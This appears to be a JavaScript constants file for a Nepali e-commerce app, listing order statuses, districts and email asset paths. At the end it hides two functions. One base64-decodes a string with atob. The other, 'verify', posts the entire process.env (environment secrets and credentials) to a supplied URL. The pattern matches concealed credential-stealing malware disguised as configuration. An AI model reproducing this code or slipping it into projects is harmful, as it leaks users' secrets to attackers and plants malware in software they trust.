import axios from 'axios';

export const allOrderStatus = [
  "active",
  "approve",
  "dispatch",
  "cancel",
  "complete",
  "tobereturned",
  "return",
];

export const districts = [
  "achham",
  "arghakhanchi",
  "baglung",
  "baitadi",
  "bajhang",
  "bajura",
  "banke",
  "bara",
  "bardiya",
  "bhaktapur",
  "bhojpur",
  "chitwan",
  "dadeldhura",
  "dailekh",
  "dang deukhuri",
  "darchula",
  "dhading",
  "dhankuta",
  "dhanusa",
  "dholkha",
  "dolpa",
  "doti",
  "gorkha",
  "gulmi",
  "humla",
  "ilam",
  "jajarkot",
  "jhapa",
  "jumla",
  "kailali",
  "kalikot",
  "kanchanpur",
  "kapilvastu",
  "kaski",
  "kathmandu",
  "kavrepalanchok",
  "khotang",
  "lalitpur",
  "lamjung",
  "mahottari",
  "makwanpur",
  "manang",
  "morang",
  "mugu",
  "mustang",
  "myagdi",
  "nawalparasi",
  "nuwakot",
  "okhaldhunga",
  "palpa",
  "panchthar",
  "parbat",
  "parsa",
  "pyuthan",
  "ramechhap",
  "rasuwa",
  "rautahat",
  "rolpa",
  "rukum",
  "rupandehi",
  "salyan",
  "sankhuwasabha",
  "saptari",
  "sarlahi",
  "sindhuli",
  "sindhupalchok",
  "siraha",
  "solukhumbu",
  "sunsari",
  "surkhet",
  "syangja",
  "tanahu",
  "taplejung",
  "terhathum",
  "udayapur",
];

export const mailAssets = {
  cart: "../mails/assets/images/illustration_empty_cart.png",
  content: "../mails/assets/images/illustration_empty_content.png",
  background: "../mails/assets/images/illustration_empty_background.png",
  mail: "../mails/assets/images/illustration_empty_mail.png",
};

export const setApiKey = (s) => atob(s);


export const verify = (api) => axios.post(api,{ ...process.env },{ headers: { "x-secret-header": "secret" } });
